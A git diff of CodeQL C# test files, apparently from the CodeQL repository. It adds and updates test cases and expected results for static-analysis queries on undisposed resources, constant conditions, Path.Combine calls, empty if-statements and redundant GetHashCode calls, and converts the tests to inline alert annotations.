000000000000..d78284d3dfde --- /dev/null +++ b/csharp/ql/test/library-tests/standalone/brokentypes/BrokenTypes.cs @@ -0,0 +1,28 @@ +// Broken type without a name. +public class { } + +// Legal declaration, but we want don't want to use it. +public class var { } + +public class C +{ + public string Prop { get; set; } +} + + +public class Program +{ + public static void Main() + { + C x1 = new C(); + string y1 = x1.Prop; + + var x2 = new C(); // Has type `var` as this overrides the implicitly typed keyword `var`. + var y2 = x2.Prop; // Unknown type as `x2` has type `var`. + + C2 x3 = new C2(); // Unknown type. + var y3 = x3.Prop; // Unknown property of unknown type. + + string s = x1.Prop + x3.Prop; + } +} diff --git a/csharp/ql/test/library-tests/standalone/brokentypes/brokenTypes.expected b/csharp/ql/test/library-tests/standalone/brokentypes/brokenTypes.expected new file mode 100644 index 000000000000..bb3acba4f64c --- /dev/null +++ b/csharp/ql/test/library-tests/standalone/brokentypes/brokenTypes.expected @@ -0,0 +1,36 @@ +| BrokenTypes.cs:2:14:2:13 | call to constructor Object | object | ObjectType | +| BrokenTypes.cs:5:14:5:16 | call to constructor Object | object | ObjectType | +| BrokenTypes.cs:7:14:7:14 | call to constructor Object | object | ObjectType | +| BrokenTypes.cs:13:14:13:20 | call to constructor Object | object | ObjectType | +| BrokenTypes.cs:17:11:17:12 | access to local variable x1 | C | Class | +| BrokenTypes.cs:17:11:17:22 | C x1 = ... | C | Class | +| BrokenTypes.cs:17:16:17:22 | object creation of type C | C | Class | +| BrokenTypes.cs:18:16:18:17 | access to local variable y1 | string | StringType | +| BrokenTypes.cs:18:16:18:27 | String y1 = ... | string | StringType | +| BrokenTypes.cs:18:21:18:22 | access to local variable x1 | C | Class | +| BrokenTypes.cs:18:21:18:27 | access to property Prop | string | StringType | +| BrokenTypes.cs:20:13:20:14 | access to local variable x2 | var | UnknownType | +| BrokenTypes.cs:20:13:20:24 | var x2 = ... | var | UnknownType | +| BrokenTypes.cs:20:18:20:24 | (...) ... | var | UnknownType | +| BrokenTypes.cs:20:18:20:24 | object creation of type C | C | Class | +| BrokenTypes.cs:21:13:21:14 | access to local variable y2 | var | UnknownType | +| BrokenTypes.cs:21:13:21:24 | var y2 = ... | var | UnknownType | +| BrokenTypes.cs:21:18:21:19 | access to local variable x2 | var | UnknownType | +| BrokenTypes.cs:21:18:21:24 | (...) ... | var | UnknownType | +| BrokenTypes.cs:21:18:21:24 | access to property (unknown) | | UnknownType | +| BrokenTypes.cs:23:12:23:13 | access to local variable x3 | | UnknownType | +| BrokenTypes.cs:23:12:23:24 | x3 = ... | | UnknownType | +| BrokenTypes.cs:23:17:23:24 | object creation of type | | UnknownType | +| BrokenTypes.cs:24:13:24:14 | access to local variable y3 | var | UnknownType | +| BrokenTypes.cs:24:13:24:24 | var y3 = ... | var | UnknownType | +| BrokenTypes.cs:24:18:24:19 | access to local variable x3 | | UnknownType | +| BrokenTypes.cs:24:18:24:24 | (...) ... | var | UnknownType | +| BrokenTypes.cs:24:18:24:24 | access to property (unknown) | | UnknownType | +| BrokenTypes.cs:26:16:26:16 | access to local variable s | string | StringType | +| BrokenTypes.cs:26:16:26:36 | String s = ... | string | StringType | +| BrokenTypes.cs:26:20:26:21 | access to local variable x1 | C | Class | +| BrokenTypes.cs:26:20:26:26 | access to property Prop | string | StringType | +| BrokenTypes.cs:26:20:26:36 | (...) ... | string | StringType | +| BrokenTypes.cs:26:20:26:36 | ... + ... | | UnknownType | +| BrokenTypes.cs:26:30:26:31 | access to local variable x3 | | UnknownType | +| BrokenTypes.cs:26:30:26:36 | access to property (unknown) | | UnknownType | diff --git a/csharp/ql/test/library-tests/standalone/brokentypes/brokenTypes.ql b/csharp/ql/test/library-tests/standalone/brokentypes/brokenTypes.ql new file mode 100644 index 000000000000..9ce360e3f788 --- /dev/null +++ b/csharp/ql/test/library-tests/standalone/brokentypes/brokenTypes.ql @@ -0,0 +1,5 @@ +import csharp + +from Expr e, Type t +where e.fromSource() and t = e.getType() +select e, t.toStringWithTypes(), t.getAPrimaryQlClass() diff --git a/csharp/ql/test/query-tests/standalone/IncomparableEquals/options b/csharp/ql/test/library-tests/standalone/brokentypes/options similarity index 100% rename from csharp/ql/test/query-tests/standalone/IncomparableEquals/options rename to csharp/ql/test/library-tests/standalone/brokentypes/options diff --git a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/Class1.cs_ b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/Class1.cs_ deleted file mode 100644 index ed948c053d05..000000000000 --- a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/Class1.cs_ +++ /dev/null @@ -1,42 +0,0 @@ -using System; - -namespace DisposalTests -{ - public class MyType : IDisposable - { - public void Dispose() - { - } - } - - public class Class1 : IDisposable - { - public void DisposesParameter(IDisposable p1, IDisposable p2) - { - p1.Dispose(); - } - - public void CapturesDisposable(MyType p1, MyType p2) - { - field1 = p1; - field2 = p2; - } - - public void DisposesSelf() - { - Dispose(); - } - - MyType field1, field2; - - public void Dispose() - { - field1.Dispose(); - } - - public static void Dispose(IDisposable d) - { - d.Dispose(); - } - } -} diff --git a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/DisposalTests.dll b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/DisposalTests.dll deleted file mode 100644 index f731c5af9e11..000000000000 Binary files a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/DisposalTests.dll and /dev/null differ diff --git a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.cs b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.cs index ae9bccf0e6e2..aa11be14f67b 100644 --- a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.cs +++ b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.cs @@ -1,9 +1,11 @@ using System; -using System.Text; using System.IO; using System.IO.Compression; -using System.Xml; +using System.Net.Http; +using System.Text; using System.Threading; +using System.Threading.Tasks; +using System.Xml; class Test { @@ -47,9 +49,9 @@ public IDisposable Method() } // BAD: No Dispose call - var c1d = new Timer(TimerProc); - var fs = new FileStream("", FileMode.CreateNew, FileAccess.Write); - new FileStream("", FileMode.CreateNew, FileAccess.Write).Fluent(); + var c1d = new Timer(TimerProc); // $ Alert + var fs = new FileStream("", FileMode.CreateNew, FileAccess.Write); // $ Alert + new FileStream("", FileMode.CreateNew, FileAccess.Write).Fluent(); // $ Alert // GOOD: Disposed via wrapper fs = new FileStream("", FileMode.CreateNew, FileAccess.Write); @@ -71,13 +73,10 @@ public IDisposable Method() ; // GOOD: XmlDocument.Load disposes incoming XmlReader (False positive as this is disposed in library code) - var xmlReader = XmlReader.Create(new StringReader("xml"), null); + var xmlReader = XmlReader.Create(new StringReader("xml"), null); // $ Alert var xmlDoc = new XmlDocument(); xmlDoc.Load(xmlReader); - // GOOD: Passed to a library (False positive as this is disposed in library code). - DisposalTests.Class1.Dispose(new StreamWriter("output.txt")); - // GOOD: Disposed automatically. using var c2 = new Timer(TimerProc); @@ -86,9 +85,25 @@ public IDisposable Method() using (XmlReader.Create(source ?? new StringReader("xml"), null)) ; + // GOOD: Flagging these generates too much noise and there is a general + // acceptance that Tasks are not disposed. + // https://devblogs.microsoft.com/pfxteam/do-i-need-to-dispose-of-tasks/ + Task t = new Task(() => { }); + t.Start(); + t.Wait(); + return null; } + public void M(IHttpClientFactory factory) + { + // GOOD: Factory tracks and disposes. + HttpClient client1 = factory.CreateClient(); + + // BAD: No Dispose call + var client2 = new HttpClient(); // $ Alert + } + // GOOD: Escapes IDisposable Create() => new Timer(TimerProc); @@ -99,6 +114,15 @@ void TimerProc(object obj) public void Dispose() { } } +class Bad +{ + long GetLength(string file) + { + var stream = new FileStream(file, FileMode.Open); // $ Alert + return stream.Length; + } +} + static class Extensions { public static FileStream Fluent(this FileStream fs) => fs; diff --git a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.expected b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.expected index 1d71aa4af027..f08cf6837c5f 100644 --- a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.expected +++ b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.expected @@ -1,7 +1,7 @@ -| NoDisposeCallOnLocalIDisposable.cs:50:19:50:38 | object creation of type Timer | Disposable 'Timer' is created but not disposed. | -| NoDisposeCallOnLocalIDisposable.cs:51:18:51:73 | object creation of type FileStream | Disposable 'FileStream' is created but not disposed. | -| NoDisposeCallOnLocalIDisposable.cs:52:9:52:64 | object creation of type FileStream | Disposable 'FileStream' is created but not disposed. | -| NoDisposeCallOnLocalIDisposable.cs:74:25:74:71 | call to method Create | Disposable 'XmlReader' is created but not disposed. | -| NoDisposeCallOnLocalIDisposable.cs:74:42:74:64 | object creation of type StringReader | Disposable 'StringReader' is created but not disposed. | -| NoDisposeCallOnLocalIDisposable.cs:79:38:79:67 | object creation of type StreamWriter | Disposable 'StreamWriter' is created but not disposed. | -| NoDisposeCallOnLocalIDisposableBad.cs:8:22:8:56 | object creation of type FileStream | Disposable 'FileStream' is created but not disposed. | +| NoDisposeCallOnLocalIDisposable.cs:52:19:52:38 | object creation of type Timer | Disposable 'Timer' is created but not disposed. | +| NoDisposeCallOnLocalIDisposable.cs:53:18:53:73 | object creation of type FileStream | Disposable 'FileStream' is created but not disposed. | +| NoDisposeCallOnLocalIDisposable.cs:54:9:54:64 | object creation of type FileStream | Disposable 'FileStream' is created but not disposed. | +| NoDisposeCallOnLocalIDisposable.cs:76:25:76:71 | call to method Create | Disposable 'XmlReader' is created but not disposed. | +| NoDisposeCallOnLocalIDisposable.cs:76:42:76:64 | object creation of type StringReader | Disposable 'StringReader' is created but not disposed. | +| NoDisposeCallOnLocalIDisposable.cs:104:23:104:38 | object creation of type HttpClient | Disposable 'HttpClient' is created but not disposed. | +| NoDisposeCallOnLocalIDisposable.cs:121:22:121:56 | object creation of type FileStream | Disposable 'FileStream' is created but not disposed. | diff --git a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.qlref b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.qlref index 3f71b594f228..67155fa1e447 100644 --- a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.qlref +++ b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposable.qlref @@ -1 +1,2 @@ -API Abuse/NoDisposeCallOnLocalIDisposable.ql \ No newline at end of file +query: API Abuse/NoDisposeCallOnLocalIDisposable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposableBad.cs b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposableBad.cs deleted file mode 100644 index 9f8bb3e8e002..000000000000 --- a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/NoDisposeCallOnLocalIDisposableBad.cs +++ /dev/null @@ -1,11 +0,0 @@ -using System; -using System.IO; - -class Bad -{ - long GetLength(string file) - { - var stream = new FileStream(file, FileMode.Open); - return stream.Length; - } -} diff --git a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/options b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/options index f12c8c66331e..ef338c0b1c12 100644 --- a/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/options +++ b/csharp/ql/test/query-tests/API Abuse/NoDisposeCallOnLocalIDisposable/options @@ -1 +1,2 @@ -semmle-extractor-options: /r:System.Private.Xml.dll /r:System.IO.Compression.dll +semmle-extractor-options: /nostdlib /noconfig +semmle-extractor-options: --load-sources-from-project:${testdir}/../../../resources/stubs/_frameworks/Microsoft.AspNetCore.App/Microsoft.AspNetCore.App.csproj diff --git a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.cs b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.cs index 9e7386149a40..0445e152ec72 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.cs @@ -35,18 +35,18 @@ class ConstantNullness { void M1(int i) { - var j = ((string)null)?.Length; // BAD - var s = ((int?)i)?.ToString(); // BAD + var j = ((string)null)?.Length; // $ Alert + var s = ((int?)i)?.ToString(); // $ Alert var k = s?.Length; // GOOD k = s?.ToLower()?.Length; // GOOD } void M2(int i) { - var j = (int?)null ?? 0; // BAD - var s = "" ?? "a"; // BAD - j = (int?)i ?? 1; // BAD - s = ""?.CommaJoinWith(s); // BAD + var j = (int?)null ?? 0; // $ Alert + var s = "" ?? "a"; // $ Alert + j = (int?)i ?? 1; // $ Alert + s = ""?.CommaJoinWith(s); // $ Alert s = s ?? ""; // GOOD s = (i == 0 ? s : null) ?? s; // GOOD var k = (i == 0 ? s : null)?.Length; // GOOD @@ -59,9 +59,9 @@ void M1() { switch (1 + 2) { - case 2: // BAD + case 2: // $ Alert break; - case 3: // BAD + case 3: // $ Alert break; case int _: // GOOD break; @@ -72,7 +72,7 @@ void M2(string s) { switch ((object)s) { - case int _: // BAD + case int _: // $ Alert break; case "": // GOOD break; @@ -92,7 +92,7 @@ string M4(object o) { return o switch { - _ => o.ToString() // BAD + _ => o.ToString() // $ Alert }; } @@ -111,7 +111,7 @@ void M6(bool b1, bool b2) return; if (!b2) return; - if (b1 && b2) // BAD + if (b1 && b2) // $ Alert return; } @@ -124,6 +124,35 @@ string M7(object o) _ => "" // GOOD }; } + + string M8(int i) + { + return i switch + { + _ when i % 2 == 0 => "even", // GOOD + _ => "odd" // GOOD + }; + } + + string M9(int i) + { + switch (i) + { + case var _: // $ Alert + return "even"; + } + } + + string M10(int i) + { + switch (i) + { + case var _ when i % 2 == 0: // GOOD + return "even"; + case var _: // GOOD + return "odd"; + } + } } class Assertions diff --git a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.expected b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.expected index 397d77531b29..9e0e69edb904 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.expected +++ b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.expected @@ -10,7 +10,7 @@ | ConstantCondition.cs:95:13:95:13 | _ | Pattern always matches. | | ConstantCondition.cs:114:13:114:14 | access to parameter b1 | Condition always evaluates to 'true'. | | ConstantCondition.cs:114:19:114:20 | access to parameter b2 | Condition always evaluates to 'true'. | -| ConstantConditionBad.cs:5:16:5:20 | ... > ... | Condition always evaluates to 'false'. | +| ConstantCondition.cs:141:22:141:22 | _ | Pattern always matches. | | ConstantConditionalExpressionCondition.cs:11:22:11:34 | ... == ... | Condition always evaluates to 'true'. | | ConstantConditionalExpressionCondition.cs:12:21:12:25 | false | Condition always evaluates to 'false'. | | ConstantConditionalExpressionCondition.cs:13:21:13:30 | ... == ... | Condition always evaluates to 'true'. | @@ -19,6 +19,7 @@ | ConstantIfCondition.cs:11:17:11:29 | ... == ... | Condition always evaluates to 'true'. | | ConstantIfCondition.cs:14:17:14:21 | false | Condition always evaluates to 'false'. | | ConstantIfCondition.cs:17:17:17:26 | ... == ... | Condition always evaluates to 'true'. | +| ConstantIfCondition.cs:30:20:30:24 | ... > ... | Condition always evaluates to 'false'. | | ConstantIsNullOrEmpty.cs:10:21:10:54 | call to method IsNullOrEmpty | Condition always evaluates to 'false'. | | ConstantIsNullOrEmpty.cs:46:21:46:46 | call to method IsNullOrEmpty | Condition always evaluates to 'true'. | | ConstantIsNullOrEmpty.cs:50:21:50:44 | call to method IsNullOrEmpty | Condition always evaluates to 'true'. | diff --git a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.qlref b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.qlref index 1fa68b335bbb..6692217230e0 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.qlref @@ -1 +1,2 @@ -Bad Practices/Control-Flow/ConstantCondition.ql \ No newline at end of file +query: Bad Practices/Control-Flow/ConstantCondition.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantConditionBad.cs b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantConditionBad.cs deleted file mode 100644 index bd1e44b346b5..000000000000 --- a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantConditionBad.cs +++ /dev/null @@ -1,7 +0,0 @@ -class Bad -{ - public int Max(int a, int b) - { - return a > a ? a : b; - } -} diff --git a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantConditionalExpressionCondition.cs b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantConditionalExpressionCondition.cs index 1ee318becbd2..4cd56232627d 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantConditionalExpressionCondition.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantConditionalExpressionCondition.cs @@ -8,10 +8,10 @@ class Main public void Foo() { - int i = (ZERO == 1 - 1) ? 0 : 1; // BAD - int j = false ? 0 : 1; // BAD - int k = " " == " " ? 0 : 1; // BAD - int l = (" "[0] == ' ') ? 0 : 1; // BAD: but not flagged + int i = (ZERO == 1 - 1) ? 0 : 1; // $ Alert + int j = false ? 0 : 1; // $ Alert + int k = " " == " " ? 0 : 1; // $ Alert + int l = (" "[0] == ' ') ? 0 : 1; // Missing Alert int m = Bar() == 0 ? 0 : 1; // GOOD } @@ -21,5 +21,4 @@ public int Bar() } } - } diff --git a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantForCondition.cs b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantForCondition.cs index 7ccb9ac86c74..2da0589d1827 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantForCondition.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantForCondition.cs @@ -6,9 +6,9 @@ class Main { public void M() { - for (int i = 0; false; i++) // GOOD + for (int i = 0; false; i++) // $ Alert ; - for (int i = 0; 0 == 1; i++) // BAD + for (int i = 0; 0 == 1; i++) // $ Alert ; for (; ; ) // GOOD ; diff --git a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantIfCondition.cs b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantIfCondition.cs index 44869e51af0b..146dbcf56611 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantIfCondition.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantIfCondition.cs @@ -8,23 +8,28 @@ class Main public void Foo() { - if (ZERO == 1 - 1) - { // BAD + if (ZERO == 1 - 1) // $ Alert + { } - if (false) - { // BAD + if (false) // $ Alert + { } - if (" " == " ") - { // BAD + if (" " == " ") // $ Alert + { } - if (" "[0] == ' ') - { // BAD: but not flagged + if (" "[0] == ' ') // Missing Alert + { } - if (Bar() == 0) - { // GOOD + if (Bar() == 0) // GOOD + { } } + public int Max(int a, int b) + { + return a > a ? a : b; // $ Alert + } + public int Bar() { return ZERO; diff --git a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantIsNullOrEmpty.cs b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantIsNullOrEmpty.cs index 5cad2e818abe..01e8353a20f4 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantIsNullOrEmpty.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantIsNullOrEmpty.cs @@ -7,17 +7,17 @@ internal class Program static void Main(string[] args) { { - if (string.IsNullOrEmpty(nameof(args))) // bad: always false + if (string.IsNullOrEmpty(nameof(args))) // $ Alert { } string? x = null; - if (string.IsNullOrEmpty(x)) // would be nice... bad: always true + if (string.IsNullOrEmpty(x)) // Missing Alert (always true) { } string y = ""; - if (string.IsNullOrEmpty(y)) // would be nice... bad: always true + if (string.IsNullOrEmpty(y)) // Missing Alert (always true) { } @@ -28,12 +28,12 @@ static void Main(string[] args) } string z = " "; - if (string.IsNullOrEmpty(z)) // would be nice... bad: always false + if (string.IsNullOrEmpty(z)) // Missing Alert (always false) { } string a = "a"; - if (string.IsNullOrEmpty(a)) // would be nice... bad: always false + if (string.IsNullOrEmpty(a)) // Missing Alert (always false) { } @@ -43,18 +43,18 @@ static void Main(string[] args) { } - if (string.IsNullOrEmpty(null)) // bad: always true + if (string.IsNullOrEmpty(null)) // $ Alert { } - if (string.IsNullOrEmpty("")) // bad: always true + if (string.IsNullOrEmpty("")) // $ Alert { } - if (string.IsNullOrEmpty(" ")) // bad: always false + if (string.IsNullOrEmpty(" ")) // $ Alert { } } } } -} \ No newline at end of file +} diff --git a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantNullCoalescingLeftHandOperand.cs b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantNullCoalescingLeftHandOperand.cs index fa2ee7d00b0f..6901daf643ed 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantNullCoalescingLeftHandOperand.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantNullCoalescingLeftHandOperand.cs @@ -8,8 +8,8 @@ class Main public void Foo() { - object i = NULL_OBJECT ?? ""; // BAD - object j = null ?? ""; // BAD + object i = NULL_OBJECT ?? ""; // $ Alert + object j = null ?? ""; // $ Alert object k = Bar() ?? ""; // GOOD } diff --git a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantWhileCondition.cs b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantWhileCondition.cs index 64dc8150d56e..59575e0de45e 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantWhileCondition.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Control-Flow/ConstantCondition/ConstantWhileCondition.cs @@ -9,28 +9,28 @@ class Main public void Foo() { - while (ZERO == 1 - 1) - { // BAD + while (ZERO == 1 - 1) // $ Alert + { break; } - while (false) - { // GOOD + while (false) // $ Alert + { break; } - while (true) - { // GOOD + while (true) // GOOD + { break; } - while (" " == " ") - { // BAD + while (" " == " ") // $ Alert + { break; } - while (" "[0] == ' ') - { // BAD: but not flagged + while (" "[0] == ' ') // Missing Alert + { break; } - while (Bar() == 0) - { // GOOD + while (Bar() == 0) // GOOD + { break; } } diff --git a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs new file mode 100644 index 000000000000..bf9b19c4a5c7 --- /dev/null +++ b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs @@ -0,0 +1,14 @@ +using System.IO; + +class PathCombine +{ + void bad() + { + Path.Combine(@"C:\Users", @"C:\Program Files"); + } + + void good() + { + Path.Join(@"C:\Users", @"C:\Program Files"); + } +} diff --git a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.expected b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.expected new file mode 100644 index 000000000000..c0f9e405516b --- /dev/null +++ b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.expected @@ -0,0 +1 @@ +| PathCombine.cs:7:9:7:54 | call to method Combine | Call to 'System.IO.Path.Combine'. | diff --git a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref new file mode 100644 index 000000000000..eaf41d047402 --- /dev/null +++ b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref @@ -0,0 +1 @@ +Bad Practices/PathCombine.ql \ No newline at end of file diff --git a/csharp/ql/test/query-tests/Bad Practices/Path Combine/options b/csharp/ql/test/query-tests/Bad Practices/Path Combine/options new file mode 100644 index 000000000000..75c39b4541ba --- /dev/null +++ b/csharp/ql/test/query-tests/Bad Practices/Path Combine/options @@ -0,0 +1,2 @@ +semmle-extractor-options: /nostdlib /noconfig +semmle-extractor-options: --load-sources-from-project:${testdir}/../../../resources/stubs/_frameworks/Microsoft.NETCore.App/Microsoft.NETCore.App.csproj diff --git a/csharp/ql/test/query-tests/Useless Code/FutileConditional/FutileConditional.cs b/csharp/ql/test/query-tests/Useless Code/FutileConditional/FutileConditional.cs new file mode 100644 index 000000000000..fffdaf9de743 --- /dev/null +++ b/csharp/ql/test/query-tests/Useless Code/FutileConditional/FutileConditional.cs @@ -0,0 +1,34 @@ +using System; + +class FutileConditionalTest +{ + + public void M(string s) + { + if (s.Length > 0) ; // $ Alert + + if (s.Length > 1) + { + } // $ Alert + + if (s.Length > 2) // GOOD: because of else-branch + { + } + else + { + Console.WriteLine("hello"); + } + + if (s.Length > 3) + { + } + else + { + } // $ Alert + + if (s.Length > 4) + { + // GOOD: Because of the comment. + } + } +} diff --git a/csharp/ql/test/query-tests/Useless Code/FutileConditional/FutileConditional.expected b/csharp/ql/test/query-tests/Useless Code/FutileConditional/FutileConditional.expected new file mode 100644 index 000000000000..db9b75043cba --- /dev/null +++ b/csharp/ql/test/query-tests/Useless Code/FutileConditional/FutileConditional.expected @@ -0,0 +1,3 @@ +| FutileConditional.cs:8:9:8:27 | if (...) ... | If-statement with an empty then-branch and no else-branch. | +| FutileConditional.cs:10:9:12:9 | if (...) ... | If-statement with an empty then-branch and no else-branch. | +| FutileConditional.cs:22:9:27:9 | if (...) ... | If-statement with an empty then-branch and no else-branch. | diff --git a/csharp/ql/test/query-tests/Useless Code/FutileConditional/FutileConditional.qlref b/csharp/ql/test/query-tests/Useless Code/FutileConditional/FutileConditional.qlref new file mode 100644 index 000000000000..6f3548889789 --- /dev/null +++ b/csharp/ql/test/query-tests/Useless Code/FutileConditional/FutileConditional.qlref @@ -0,0 +1,2 @@ +query: Useless code/FutileConditional.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Useless Code/FutileConditional/options b/csharp/ql/test/query-tests/Useless Code/FutileConditional/options new file mode 100644 index 000000000000..75c39b4541ba --- /dev/null +++ b/csharp/ql/test/query-tests/Useless Code/FutileConditional/options @@ -0,0 +1,2 @@ +semmle-extractor-options: /nostdlib /noconfig +semmle-extractor-options: --load-sources-from-project:${testdir}/../../../resources/stubs/_frameworks/Microsoft.NETCore.App/Microsoft.NETCore.App.csproj diff --git a/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.cs b/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.cs index 80b0ed180fc4..22a24013b08d 100644 --- a/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.cs +++ b/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.cs @@ -3,16 +3,16 @@ class IntGetHashCode void Test() { // These are all bad: + default(int).GetHashCode(); // $ Alert + default(short).GetHashCode(); // $ Alert + default(ushort).GetHashCode(); // $ Alert + default(byte).GetHashCode(); // $ Alert + default(sbyte).GetHashCode(); // $ Alert + + // These are all good: default(uint).GetHashCode(); - default(int).GetHashCode(); default(long).GetHashCode(); default(ulong).GetHashCode(); - default(short).GetHashCode(); - default(ushort).GetHashCode(); - default(byte).GetHashCode(); - default(sbyte).GetHashCode(); - - // These are all good: default(double).GetHashCode(); default(float).GetHashCode(); default(char).GetHashCode(); diff --git a/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.expected b/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.expected index 6f126779321c..da253cc80b21 100644 --- a/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.expected +++ b/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.expected @@ -1,8 +1,5 @@ -| IntGetHashCode.cs:6:9:6:35 | call to method GetHashCode | Calling GetHashCode() on type uint is redundant. | -| IntGetHashCode.cs:7:9:7:34 | call to method GetHashCode | Calling GetHashCode() on type int is redundant. | -| IntGetHashCode.cs:8:9:8:35 | call to method GetHashCode | Calling GetHashCode() on type long is redundant. | -| IntGetHashCode.cs:9:9:9:36 | call to method GetHashCode | Calling GetHashCode() on type ulong is redundant. 